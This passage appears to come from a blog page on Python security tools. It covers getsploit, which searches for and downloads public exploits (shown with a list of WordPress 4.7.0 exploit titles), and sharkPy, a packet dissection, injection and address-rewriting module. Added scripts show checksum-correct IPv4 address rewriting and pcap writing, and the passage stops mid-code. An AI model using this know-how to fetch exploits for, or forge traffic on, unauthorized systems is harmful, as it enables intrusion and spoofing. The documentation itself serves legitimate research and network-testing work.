Showing posts with label Python. Show all posts

getsploit - Command line utility for searching and downloading exploits


Command-line search and download tool for the Vulners database, inspired by searchsploit. It lets you search online for exploits across the most popular collections: Exploit-DB, Metasploit, Packetstorm and others. Its most useful feature is immediate download of exploit source into your working directory. The downloaded files are third-party code from those collections: read them before executing anything.

Python version
The utility was tested on Python 2.6, 2.7 and 3.6. If you find any bugs, don't hesitate to open an issue.

How to use

Search
# git clone https://github.com/vulnersCom/getsploit
# cd getsploit
# ./getsploit.py wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
| ID | Exploit Title | URL |
+======================+================================+====================================================+
| PACKETSTORM:141039 | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
| | PHP Code Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41308 | WordPress 4.7.0/4.7.1 Plugin | https://vulners.com/exploitdb/EDB-ID:41308 |
| | Insert PHP - PHP Code | |
| | Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41223 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41223 |
| | Unauthenticated Content | |
| | Injection (PoC) | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140893 | WordPress 4.7.0 / 4.7.1 REST | https://vulners.com/packetstorm/PACKETSTORM:140893 |
| | API Privilege Escalation | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140902 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140902 |
| | Content Injection / Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140901 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140901 |
| | Content Injection Proof Of | |
| | Concept | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41224 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41224 |
| | Unauthenticated Content | |
| | Injection Arbitrary Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| SSV-92637 | WordPress REST API content | https://vulners.com/seebug/SSV-92637 |
| | injection | |
+----------------------+--------------------------------+----------------------------------------------------+

Save exploit files
# ./getsploit.py -m wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
| ID | Exploit Title | URL |
+======================+================================+====================================================+
| PACKETSTORM:141039 | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
| | PHP Code Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41308 | WordPress 4.7.0/4.7.1 Plugin | https://vulners.com/exploitdb/EDB-ID:41308 |
| | Insert PHP - PHP Code | |
| | Injection | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41223 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41223 |
| | Unauthenticated Content | |
| | Injection (PoC) | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140893 | WordPress 4.7.0 / 4.7.1 REST | https://vulners.com/packetstorm/PACKETSTORM:140893 |
| | API Privilege Escalation | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140902 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140902 |
| | Content Injection / Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| PACKETSTORM:140901 | WordPress 4.7.0 / 4.7.1 | https://vulners.com/packetstorm/PACKETSTORM:140901 |
| | Content Injection Proof Of | |
| | Concept | |
+----------------------+--------------------------------+----------------------------------------------------+
| EDB-ID:41224 | WordPress 4.7.0/4.7.1 - | https://vulners.com/exploitdb/EDB-ID:41224 |
| | Unauthenticated Content | |
| | Injection Arbitrary Code | |
| | Execution | |
+----------------------+--------------------------------+----------------------------------------------------+
| SSV-92637 | WordPress REST API content | https://vulners.com/seebug/SSV-92637 |
| | injection | |
+----------------------+--------------------------------+----------------------------------------------------+

# ls
LICENSE README.md getsploit.py wordpress-470
# cd wordpress-470
# ls
edb-id41223.txt edb-id41224.txt edb-id41308.txt packetstorm140893.txt packetstorm140901.txt packetstorm140902.txt packetstorm141039.txt ssv-92637.txt

Local database
If your Python has the built-in sqlite3 module, you can use the --update and --local options to download the whole exploit database to your machine. After the update you can perform offline searches.
# ./getsploit.py --update
Downloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.
219642496/219642496 [100.00%]
Unpacking database.
Database download complete. Now you may search exploits using --local key './getsploit.py -l wordpress 4.7'


sharkPy - NSA Tool to Dissect, Analyze, and Interact with Network Packet Data using Wireshark and libpcap capabilities


A python module to dissect, analyze, and interact with network packet data as native Python objects using Wireshark and libpcap capabilities. sharkPy dissect modules extend and otherwise modify Wireshark's tshark. SharkPy packet injection and pcap file writing modules wrap useful libpcap functionality.

SharkPy comes with six modules that allow one to explore, create, and/or modify packet data, (re)send data over the network, and write (possibly modified) packets to a new pcap output file. This is all done within a Python program or an interactive Python session.
  1. sharkPy.file_dissector -- dissect capture file packets using Wireshark's dissection libraries and present detailed packet dissections to caller as native Python objects.
  2. sharkPy.wire_dissector -- capture packets from interface and dissect captured packets using Wireshark's dissection libraries. Presents packets to callers as native Python objects.
  3. sharkPy.file_writer -- write (possibly modified) packets to a new output pcap file. For example, one can dissect packet capture file using sharkPy.file_dissector, create new packets based on the packets in the dissected file, and then write new/modified packets to an output pcap file.
  4. sharkPy.wire_writer -- write arbitrary data (e.g. modified packets) to specified network interface using libpcap functionality. Currently, sharkPy users are responsible for correctly building packets that are transmitted using this module's functionality.
  5. sharkPy.utils -- a set of utility functions
  6. sharkPy.protocol_blender -- protocol specific convenience functions. Currently contains functions for ipv4 and tcp over ipv4.
SharkPy is provided "as-is" with NO WARRANTIES expressed or implied under GPLv2. Use at your own risk.

Design Goals
  1. Deliver dissected packet data to callers as native python objects.
  2. Provide functionality within a Python environment, either a python program or interactive python session.
  3. Make commands non-blocking whenever reasonable providing command results to caller on-demand.
  4. Be easy to understand and use assuming one understands Wireshark and python basics.
  5. Pack functionality into a small number of commands.
  6. Build and install as little C-code as possible by linking to preexisting Wireshark shared libs.

Why sharkPy?
SharkPy has a long-term goal of segmenting Wireshark's incredible diversity of capabilities into a set of shared libraries that are smaller, more modular, and more easily compiled and linked into other projects. This goal separates sharkPy from other similar efforts that endeavor to marry Wireshark/tshark and Python.
The first step is to provide Wireshark/tshark capabilities as Python modules that can be compiled/linked outside of Wireshark's normal build process. This has been achieved at least for some Linux environments/distros. The next step is to expand to a broader range of Linux distros and to Windows, improving stability along the way. Once this is completed and sharkPy's capabilities are similar to those provided by tshark, the sharkPy project devs will start the process of segmenting the code base as described above.

HOW-TO

VM INSTALL

Should install/run on most linux distros as long as Wireshark version 2.0.1 or newer is installed and the following steps (or equivalent) are successful.

## ubuntu-16.04-desktop-amd64 -- clean install
sudo apt-get install git
git clone https://github.com/NationalSecurityAgency/sharkPy
sudo apt-get install libpcap-dev
sudo apt-get install libglib2.0-dev
sudo apt-get install libpython-dev
sudo apt-get install wireshark-dev #if you didn't build/install wireshark (be sure wireshark libs are in LD_LIBRARY_PATH)
sudo apt-get install wireshark #if you didn't build/install wireshark (be sure wireshark libs are in LD_LIBRARY_PATH)
cd sharkPy
sudo ./setup install

DOCKER

Set up
First, make a sharkPy directory and place the Dockerfile into it. cd into this new directory.

Build sharkPy Docker image
docker build -t "ubuntu16_04:sharkPy" .

Notes:
  • build will take a while and should be completely automated.
  • sharkPy dist code will be in /sharkPy
  • build creates Ubuntu 16.04 image and installs sharkPy as a Python module

Run interactively as Docker container.
This should give you a command prompt
docker run -it ubuntu16_04:sharkPy /bin/bash

Command prompt and access to host NICs (to allow for network capture)
docker run -it --net=host ubuntu16_04:sharkPy /bin/bash


sharkPy API

Dissecting packets from file

dissect_file(file_path, options=[], timeout=10): collect packets from packet capture file delivering packet dissections when requested using get_next_from_file function.
  • file_path: name of packet capture file.
  • options: collection and dissection options. Options are disopt.DECODE_AS and disopt.NAME_RESOLUTION.
  • timeout: amount of time (in seconds) to wait before the file open fails.
  • RETURNS tuple (p, exit_event, shared_pipe):
    • p: dissection process handle.
    • exit_event: event handler used to signal that collection should stop.
    • shared_pipe: shared pipe that dissector returns dissection trees into.
    • NOTE: users should not directly interact with these return objects. Instead returned tuple is passed into get_next_from_file and close_file functions as input param.
get_next_from_file(dissect_process,timeout=None): get next available packet dissection.
  • dissect_process: tuple returned from the dissect_file function.
  • timeout: amount of time to wait (in seconds) before the operation times out.
  • RETURNS root node of packet dissection tree.
close_file(dissect_process): stop and clean up.
  • dissect_process: tuple returned from the dissect_file function.
  • RETURNS None.
  • NOTE: close_file MUST be called on each session.

Dissecting packets from wire

dissect_wire(interface, options=[], timeout=None): collect packets from interface delivering packet dissections when requested using get_next function.
  • interface: name of interface to capture from.
  • options: collection and dissection options. Options are disopt.DECODE_AS, disopt.NAME_RESOLUTION, and disopt.NOT_PROMISCUOUS.
  • timeout: amount of time (in seconds) to wait before the capture start fails.
  • RETURNS tuple (p, exit_event, shared_queue).
    • p: dissection process handle.
    • exit_event: event handler used to signal that collection should stop.
    • shared_queue: shared queue that dissector returns dissection trees into.
    • NOTE: users should not directly interact with these return objects. Instead returned tuple is passed into get_next_from_wire and close_wire functions as input param.
get_next_from_wire(dissect_process,timeout=None): get next available packet dissection from live capture.
  • dissect_process: tuple returned from the dissect_wire function.
  • timeout: amount of time to wait (in seconds) before the operation times out.
  • RETURNS root node of packet dissection tree.
close_wire(dissect_process): stop and clean up from live capture.
  • dissect_process: tuple returned from the dissect_wire function.
  • RETURNS None.
  • NOTE: close_wire MUST be called on each capture session.

Writing data/packets on wire or to file

wire_writer(write_interface_list): wire_writer constructor. Used to write arbitrary data to interfaces.
  • write_interface_list: list of interface names to write to.
  • RETURNS: wire_writer object.
    • wire_writer.cmd: pass a command to writer.
      • wr.cmd(command=wr.WRITE_BYTES, command_data=data_to_write, command_timeout=2)
      • wr.cmd(command=wr.SHUT_DOWN_ALL, command_data=None, command_timeout=2)
      • wr.cmd(command=wr.SHUT_DOWN_NAMED, command_data=interface_name, command_timeout=2)
    • wire_writer.get_rst(timeout=1): RETURNS tuple (success/failure, number_of_bytes_written)
file_writer(): Creates a new file_writer object to write packets to an output pcap file.
  • make_pcap_error_buffer(): Creates a correctly sized and initialized error buffer.
    • Returns error buffer.
  • pcap_write_file(output_file_path, error_buffer): create and open new pcap output file.
    • output_file_path: path for newly created file.
    • err_buffer: error buffer object returned by make_pcap_error_buffer(). Any error messages will be written to this buffer.
    • RETURNS: ctypes.c_void_p, which is a context object required for other write related functions.
  • pcap_write_packet(context, upper_time_val, lower_time_val, num_bytes_to_write, data_to_write, error_buffer): writes packets to opened pcap output file.
    • context: object returned by pcap_write_file().
    • upper_time_val: packet epoch time in seconds. Can be first value in tuple returned from utility function get_pkt_times().
    • lower_time_val: packet epoch time nano seconds remainder. Can be second value in tuple returned from utility function get_pkt_times().
    • num_bytes_to_write: number of bytes to write to file, size of data buffer.
    • data_to_write: buffer of data to write.
    • err_buffer: error buffer object returned by make_pcap_error_buffer(). Any error messages will be written to this buffer.
    • RETURNS 0 on success, -1 on failure. Error message will be available in err_buffer.
  • pcap_close(context): MUST be called to flush write buffer, close write file, and free allocated resources.
    • context: object returned by pcap_write_file().
    • RETURNS: None.

Utility functions

do_funct_walk(root_node, funct, aux=None): recursively pass each node in dissection tree (and aux) to function. Depth first walk.
  • root_node: node in dissection tree that will be the first to be passed to function.
  • funct: function to call.
  • aux: optional auxiliary variable that will be passed in as a parameter as part of each function call.
  • RETURNS None.
get_node_by_name(root_node, name): finds and returns a list of dissection nodes in dissection tree with a given name (i.e. 'abbrev').
  • root_node: root of dissection tree being passed into function.
  • name: Name of node used as match key. Matches against the 'abbrev' attribute.
  • RETURNS: a list of nodes in dissection tree with 'abbrev' attribute that matches name.
  • NOTE: 'abbrev' attribute is not necessarily unique in a given dissection tree. This is the reason that this function returns a LIST of matching nodes.
get_node_data_details(node): Returns a tuple of values that describe the data in a given dissection node.
  • node: node that will have its details provided.
  • RETURNS: tuple (data_len,first_byte_index, last_byte_index, data, binary_data).
    • data_len: number of bytes in node's data.
    • first_byte_index: byte offset from start of packet where this node's data starts.
    • last_byte_index: byte offset from start of packet where this node's data ends.
    • data: string representation of node data.
    • binary_data: binary representation of node data.
get_pkt_times(pkt=input_packet): Returns tuple containing packet timestamp information.
  • pkt: packet dissection tree returned from one of sharkPy's dissection routines.
  • RETURNS: The tuple (epoch_time_seconds, epoch_time_nanosecond_remainder). These two values are required for file_writer instances.
find_replace_data(pkt, field_name, test_val, replace_with=None, condition_funct=condition_data_equals, enforce_bounds=True, quiet=True): A general search, match, and replace data in packets.
  • pkt: packet dissection tree returned from one of sharkPy's dissection routines.
  • field_name: the 'abbrev' field name that will have its data modified/replaced.
  • test_val: data_val/buffer that will be used for comparison in matching function.
  • replace_with: data that will replace the data in matching dissection fields.
  • condition_funct: A function that returns True or False and has the prototype condition_funct(node_val, test_val, pkt_dissection_tree). Default is the condition_data_equals() function that returns True if node_val == test_val. This is a literal byte for byte matching.
  • enforce_bounds: If set to True, enforces condition that len(replace_with) == len(node_data_to_be_replaced). Good idea to keep this set to its default, which is True.
  • quiet: If set to False, will print error message to stdout if the target field 'abbrev' name cannot be found in packet dissection tree.
  • RETURNS: new packet data represented as a hex string or None if target field is not in packet.
condition_data_equals(node_val, test_val, pkt_dissection_tree=None): A matching function that can be passed to find_replace_data().
  • node_val: value from the dissected packet that is being checked
  • test_val: value that node_val will be compared to.
  • pkt_dissection_tree: entire packet dissection tree. Not used in this comparison.
  • RETURNS True if a byte for byte comparison reveals that node_val == test_val. Otherwise, returns False.
condition_always_true(node_val=None, test_val=None, pkt_dissection_tree=None): A matching function that can be passed to find_replace_data().
  • node_val: Not used in this comparison
  • test_val: Not used in this comparison
  • pkt_dissection_tree: entire packet dissection tree. Not used in this comparison.
  • RETURNS True ALWAYS. Useful if the only matching criterion is that the target field exists in the packet dissection.

Protocol Blender

ipv4_find_replace(pkt_dissection, src_match_value=None, dst_match_value=None, new_srcaddr=None, new_dstaddr=None, update_checksum=True, condition_funct=sharkPy.condition_data_equals): Modifies select ipv4 fields.
  • pkt_dissection: packet dissection tree.
  • src_match_value: current source ip address to look for (in hex). This value will be replaced.
  • dst_match_value: current destination ip address to look for (in hex). This value will be replaced.
  • new_srcaddr: replace current source ip address with this ip address (in hex).
  • new_dstaddr: replace current destination ip address with this ip address (in hex).
  • update_checksum: fixup ipv4 checksum if True (default).
  • condition_funct: matching function used to find correct packets to modify.
tcp_find_replace(pkt_dissection, src_match_value=None, dst_match_value=None, new_srcport=None, new_dstport=None, update_checksum=True, condition_funct=sharkPy.condition_data_equals): Modifies select fields for tcp over ipv4.
  • pkt_dissection: packet dissection tree.
  • src_match_value: current source tcp port to look for (in hex). This value will be replaced.
  • dst_match_value: current destination tcp port to look for (in hex). This value will be replaced.
  • new_srcport: replace current source tcp port with this tcp port (in hex).
  • new_dstport: replace current destination tcp port with this tcp port (in hex).
  • update_checksum: fixup tcp checksum if True (default).
  • condition_funct: matching function used to find correct packets to modify.
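
What an address rewrite has to do to the checksums, as an added example that is not sharkPy code: the description of ipv4_find_replace above mentions only the IPv4 header checksum, but the TCP checksum also covers a pseudo-header holding both IP addresses, so a frame whose addresses were swapped with only the IP checksum refreshed verifies at the IP layer and fails at the TCP layer. The frame, offsets and helper names below are this example's own assumptions (a plain Ethernet/IPv4/TCP frame with no options; the addresses match the hex values used later on this page).

```python
"""Rewrite IPv4 addresses in a raw Ethernet/IPv4/TCP frame and fix both checksums.

Added example, not sharkPy code. Frame layout assumed: 14-byte Ethernet header,
20-byte IPv4 header without options, 20-byte TCP header without options.
"""
import struct

ETH_LEN = 14
IP_LEN = 20


def ones_complement_sum(data):
    """RFC 1071 checksum over data (an odd trailing byte is zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ip_checksum(frame):
    """IPv4 header checksum, computed with the checksum field zeroed."""
    hdr = bytearray(frame[ETH_LEN:ETH_LEN + IP_LEN])
    hdr[10:12] = b"\x00\x00"
    return ones_complement_sum(bytes(hdr))


def tcp_checksum(frame):
    """TCP checksum: pseudo-header (src, dst, zero, proto 6, tcp length) + segment."""
    ip = frame[ETH_LEN:ETH_LEN + IP_LEN]
    total_len = struct.unpack("!H", ip[2:4])[0]
    seg = bytearray(frame[ETH_LEN + IP_LEN:ETH_LEN + total_len])
    seg[16:18] = b"\x00\x00"
    pseudo = ip[12:16] + ip[16:20] + struct.pack("!BBH", 0, 6, len(seg))
    return ones_complement_sum(pseudo + bytes(seg))


def verify(frame):
    """Return (ipv4_checksum_ok, tcp_checksum_ok) for the stored checksum fields."""
    ip_stored = struct.unpack("!H", frame[ETH_LEN + 10:ETH_LEN + 12])[0]
    tcp_off = ETH_LEN + IP_LEN + 16
    tcp_stored = struct.unpack("!H", frame[tcp_off:tcp_off + 2])[0]
    return ip_stored == ip_checksum(frame), tcp_stored == tcp_checksum(frame)


def rewrite_ipv4_addrs(frame, new_src, new_dst, fix_tcp=True):
    """Replace src/dst (given as hex strings, as on this page) and refresh checksums.

    fix_tcp=False reproduces an IP-only fixup so the TCP failure can be observed.
    """
    src, dst = bytes.fromhex(new_src), bytes.fromhex(new_dst)
    if len(src) != 4 or len(dst) != 4:   # same idea as enforce_bounds: same length in, same length out
        raise ValueError("IPv4 addresses must be exactly 4 bytes")
    out = bytearray(frame)
    out[ETH_LEN + 12:ETH_LEN + 16] = src
    out[ETH_LEN + 16:ETH_LEN + 20] = dst
    out[ETH_LEN + 10:ETH_LEN + 12] = struct.pack("!H", ip_checksum(bytes(out)))
    if fix_tcp:
        off = ETH_LEN + IP_LEN + 16
        out[off:off + 2] = struct.pack("!H", tcp_checksum(bytes(out)))
    return bytes(out)


def build_sample_frame():
    """Constructed 54-byte frame: 192.168.79.1:52630 -> 192.168.79.255:80, bare ACK."""
    eth = bytes.fromhex("005056edfe68") + bytes.fromhex("000c29aabbcc") + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0x1234, 0x4000, 64, 6, 0,
                     bytes.fromhex("c0a84f01"), bytes.fromhex("c0a84fff"))
    tcp = struct.pack("!HHIIBBHHH", 52630, 80, 0xDF6129CA, 0x0D993E77, 0x50, 0x10, 32120, 0, 0)
    frame = bytearray(eth + ip + tcp)
    frame[ETH_LEN + 10:ETH_LEN + 12] = struct.pack("!H", ip_checksum(bytes(frame)))
    tcp_off = ETH_LEN + IP_LEN + 16
    frame[tcp_off:tcp_off + 2] = struct.pack("!H", tcp_checksum(bytes(frame)))
    return bytes(frame)


if __name__ == "__main__":
    f = build_sample_frame()
    print("original:", verify(f))
    print("IP checksum only:", verify(rewrite_ipv4_addrs(f, "01010101", "02020202", fix_tcp=False)))
    print("both fixed:", verify(rewrite_ipv4_addrs(f, "01010101", "02020202")))
```

The practical check after any address swap written to the wire or to a pcap is therefore to verify both layers, not only the IPv4 header; a capture tool will otherwise show the rewritten packets with a bad TCP checksum.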

Dissect packets in a capture file
>>> import sharkPy

Supported options so far are DECODE_AS and NAME_RESOLUTION (the latter is used to disable name resolution)
>>> in_options=[(sharkPy.disopt.DECODE_AS, r'tcp.port==8888-8890,http'), (sharkPy.disopt.DECODE_AS, r'tcp.port==9999:3,http')]

Start file read and dissection.
>>> dissection = sharkPy.dissect_file(r'/home/me/capfile.pcap', options=in_options)

Use sharkPy.get_next_from_file to get packet dissections of read packets.
>>> rtn_pkt_dissections_list = []
>>> for cnt in xrange(13):
...     pkt = sharkPy.get_next_from_file(dissection)
...     rtn_pkt_dissections_list.append(pkt)
...

Node Attributes:
abbrev: frame.
name: Frame.
blurb: None.
fvalue: None.
level: 0.
offset: 0.
ftype: 1.
ftype_desc: FT_PROTOCOL.
repr: Frame 253: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0.
data: 005056edfe68000c29....<rest edited out>

Number of child nodes: 17
frame.interface_id
frame.encap_type
frame.time
frame.offset_shift
frame.time_epoch
frame.time_delta
frame.time_delta_displayed
frame.time_relative
frame.number
frame.len
frame.cap_len
frame.marked
frame.ignored
frame.protocols
eth
ip
tcp

Node Attributes:
abbrev: frame.interface_id.
name: Interface id.
blurb: None.
fvalue: 0.
level: 1.
offset: 0.
ftype: 6.
ftype_desc: FT_UINT32.
repr: Interface id: 0 (eno16777736).
data: None.

Number of child nodes: 0

...<remaining edited out>

Must always close sessions
>>> sharkPy.close_file(dissection)

Take a packet dissection tree and index all nodes by their names (abbrev field)
>>> pkt_dict = {}
>>> sharkPy.collect_proto_ids(rtn_pkt_dissections_list[0], pkt_dict)

Here are all the keys used to index this packet dissection
>>> print pkt_dict.keys()
['tcp.checksum_bad', 'eth.src_resolved', 'tcp.flags.ns', 'ip', 'frame', 'tcp.ack', 'tcp', 'frame.encap_type', 'eth.ig', 'frame.time_relative', 'ip.ttl', 'tcp.checksum_good', 'tcp.stream', 'ip.version', 'tcp.seq', 'ip.dst_host', 'ip.flags.df', 'ip.flags', 'ip.dsfield', 'ip.src_host', 'tcp.len', 'ip.checksum_good', 'tcp.flags.res', 'ip.id', 'ip.flags.mf', 'ip.src', 'ip.checksum', 'eth.src', 'text', 'frame.cap_len', 'ip.hdr_len', 'tcp.flags.cwr', 'tcp.flags', 'tcp.dstport', 'ip.host', 'frame.ignored', 'tcp.window_size', 'eth.dst_resolved', 'tcp.flags.ack', 'frame.time_delta', 'tcp.flags.urg', 'ip.dsfield.ecn', 'eth.addr_resolved', 'eth.lg', 'frame.time_delta_displayed', 'frame.time', 'tcp.flags.str', 'ip.flags.rb', 'tcp.flags.fin', 'ip.dst', 'tcp.flags.reset', 'tcp.flags.ecn', 'tcp.port', 'eth.type', 'ip.checksum_bad', 'tcp.window_size_value', 'ip.addr', 'ip.len', 'frame.time_epoch', 'tcp.hdr_len', 'frame.number', 'ip.dsfield.dscp', 'frame.marked', 'eth.dst', 'tcp.flags.push', 'tcp.srcport', 'tcp.checksum', 'tcp.urgent_pointer', 'eth.addr', 'frame.offset_shift', 'tcp.window_size_scalefactor', 'ip.frag_offset', 'tcp.flags.syn', 'frame.len', 'eth', 'ip.proto', 'frame.protocols', 'frame.interface_id']

Note that pkt_dict entries are lists given that 'abbrevs' are not always unique within a packet.
>>> val_list = pkt_dict['tcp']

Turns out that 'tcp' list has only one element as shown below.
>>> for each in val_list:
...     print each
...
Node Attributes:
abbrev: tcp.
name: Transmission Control Protocol.
blurb: None.
fvalue: None.
level: 0.
offset: 34.
ftype: 1.
ftype_desc: FT_PROTOCOL.
repr: Transmission Control Protocol, Src Port: 52630 (52630), Dst Port: 80 (80), Seq: 1, Ack: 1, Len: 0.
data: cd960050df6129ca0d993e7750107d789f870000.

Number of child nodes: 15
tcp.srcport
tcp.dstport
tcp.port
tcp.port
tcp.stream
tcp.len
tcp.seq
tcp.ack
tcp.hdr_len
tcp.flags
tcp.window_size_value
tcp.window_size
tcp.window_size_scalefactor
tcp.checksum
tcp.urgent_pointer

Shortcut for finding a node by name:
>>> val_list = sharkPy.get_node_by_name(rtn_pkt_dissections_list[0], 'ip')

Each node in a packet dissection tree has attributes and a child node list.
>>> pkt = val_list[0]

This is how one accesses attributes
>>> print pkt.attributes.abbrev
tcp
>>> print pkt.attributes.name
Transmission Control Protocol

Here's the pkt's child list
>>> print pkt.children
[<sharkPy.dissect.file_dissector.node object at 0x10fda90>, <sharkPy.dissect.file_dissector.node object at 0x10fdb10>, <sharkPy.dissect.file_dissector.node object at 0x10fdbd0>, <sharkPy.dissect.file_dissector.node object at 0x10fdc90>, <sharkPy.dissect.file_dissector.node object at 0x10fdd50>, <sharkPy.dissect.file_dissector.node object at 0x10fddd0>, <sharkPy.dissect.file_dissector.node object at 0x10fde50>, <sharkPy.dissect.file_dissector.node object at 0x10fded0>, <sharkPy.dissect.file_dissector.node object at 0x10fdf90>, <sharkPy.dissect.file_dissector.node object at 0x1101090>, <sharkPy.dissect.file_dissector.node object at 0x11016d0>, <sharkPy.dissect.file_dissector.node object at 0x11017d0>, <sharkPy.dissect.file_dissector.node object at 0x1101890>, <sharkPy.dissect.file_dissector.node object at 0x1101990>, <sharkPy.dissect.file_dissector.node object at 0x1101b50>]

Get useful information about a dissection node's data
>>> data_len, first_byte_offset, last_byte_offset, data_string_rep, data_binary_rep=sharkPy.get_node_data_details(pkt)
>>> print data_len
54
>>> print first_byte_offset
0
>>> print last_byte_offset
53
>>> print data_string_rep
005056edfe68000c29....<rest edited out>
>>> print data_binary_rep
<prints raw binary data, edited out>

CAPTURE PACKETS FROM NETWORK AND DISSECT THEM

SharkPy wire_dissector provides an additional NOT_PROMISCUOUS option
>>> in_options=[(sharkPy.disopt.DECODE_AS, r'tcp.port==8888-8890,http'), (sharkPy.disopt.DECODE_AS, r'tcp.port==9999:3,http'), (sharkPy.disopt.NOT_PROMISCUOUS, None)]

Start capture and dissection. Note that caller must have appropriate permissions. Running as root could be dangerous!
>>> dissection = sharkPy.dissect_wire(r'eno16777736', options=in_options)
>>> Running as user "root" and group "root". This could be dangerous.

Use sharkPy.get_next_from_wire to get packet dissections of captured packets.
>>> for cnt in xrange(13):
...     pkt=sharkPy.get_next_from_wire(dissection)
...     sharkPy.walk_print(pkt) ## much better idea to save pkts in a list
...

Must always close capture sessions
>>> sharkPy.close_wire(dissection)

WRITE DATA (packets) TO NETWORK

Create writer object using interface name
>>> wr = sharkPy.wire_writer(['eno16777736'])

Send command to write data to network with timeout of 2 seconds
>>> wr.cmd(wr.WRITE_BYTES,'  djwejkweuraiuhqwerqiorh', 2)

Check for failure. If successful, get return values.
>>> if(not wr.command_failure.is_set()):
...     print wr.get_rst(1)
...
(0, 26) ### returned success and wrote 26 bytes. ###

WRITE PACKETS TO OUTPUT PCAP FILE

Create file writer object
>>> fw = sharkPy.file_writer()

Create error buffer
>>> errbuf = fw.make_pcap_error_buffer()

Open/create new output pcap file into which packets will be written
>>> outfile = fw.pcap_write_file(r'/home/me/test_output_file.pcap', errbuf)

Dissect packets in an existing packet capture file. dissect_file returns a session tuple; packets are pulled from it one at a time with get_next_from_file.
>>> dissection = sharkPy.dissect_file(r'/home/me/tst.pcap', timeout=20)

Write first packet into output pcap file.

Get first packet dissection
>>> pkt_dissection = sharkPy.get_next_from_file(dissection)

Acquire packet information required for write operation
>>> pkt_frame = sharkPy.get_node_by_name(pkt_dissection, 'frame')
>>> frame_data_length, first_frame_byte_index, last_frame_byte_index, frame_data_as_string, frame_data_as_binary = sharkPy.get_node_data_details(pkt_frame[0])
>>> utime, ltime = sharkPy.get_pkt_times(pkt_dissection)

Write packet into output file
>>> fw.pcap_write_packet(outfile, utime, ltime, frame_data_length, frame_data_as_binary, errbuf)

Close output file and clean up, then close the dissection session (both are required to release resources)
>>> fw.pcap_close(outfile)
>>> sharkPy.close_file(dissection)

Match and replace before writing new packets to output pcap file
import sharkPy, binascii

# match values are the raw hex of the bytes to look for (no 0x prefix):
# find_replace_data compares byte for byte, and the replacement must have the same length
test_value1 = r'c0a84f01'       # 192.168.79.1
test_value2 = r'c0a84fff'       # 192.168.79.255
test_value3 = r'005056c00008'   # source MAC

num_packets = 13                # number of packets to process from tst.pcap; set this for your file

fw = sharkPy.file_writer()
errbuf = fw.make_pcap_error_buffer()
outfile = fw.pcap_write_file(r'/home/me/test_output_file.pcap', errbuf)
dissection = sharkPy.dissect_file(r'/home/me/tst.pcap', timeout=20)

for cnt in range(num_packets):
    pkt = sharkPy.get_next_from_file(dissection)

    # do replacements; each call returns the whole frame as a hex string, or None when
    # the target field is absent from this packet, so keep only the real results
    new_str_data = None
    for field, match_val, repl_val in ((r'ip.src', test_value1, r'01010101'),
                                       (r'ip.dst', test_value2, r'02020202'),
                                       (r'eth.src', test_value3, r'005050505050')):
        result = sharkPy.find_replace_data(pkt, field, match_val, repl_val)
        if result is not None:
            new_str_data = result

    # get details required to write to output pcap file
    pkt_frame = sharkPy.get_node_by_name(pkt, 'frame')
    fdl, ffb, flb, fd, fbd = sharkPy.get_node_data_details(pkt_frame[0])
    utime, ltime = sharkPy.get_pkt_times(pkt)

    # nothing matched in this packet: write the original frame bytes unchanged
    if new_str_data is None:
        new_str_data = fd

    newbd = binascii.a2b_hex(new_str_data)
    fw.pcap_write_packet(outfile, utime, ltime, fdl, newbd, errbuf)

fw.pcap_close(outfile)
sharkPy.close_file(dissection)
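
What pcap_write_packet's (upper_time_val, lower_time_val) pair ends up as on disk, as an added example that is not sharkPy's file_writer: a pcap file is a 24-byte global header followed by a 16-byte record header per packet, and the record header carries the timestamp as whole seconds plus a fractional part. The writer below stores the nanosecond remainder that get_pkt_times returns in a nanosecond-resolution pcap (magic 0xa1b23c4d); a classic microsecond pcap (magic 0xa1b2c3d4) would store remainder // 1000 instead. Which of the two sharkPy's libpcap wrapper produces is not stated on this page, so that is left as an assumption; the reader handles both. File names and the two frames are constructed for this example.

```python
"""Minimal pcap writer and reader showing the (seconds, nanoseconds) timestamp split.

Added example, not sharkPy code. Little-endian pcap only; linktype 1 (Ethernet).
"""
import os
import struct
import tempfile

PCAP_MAGIC_NS = 0xA1B23C4D     # nanosecond-resolution pcap
PCAP_MAGIC_US = 0xA1B2C3D4     # classic microsecond-resolution pcap
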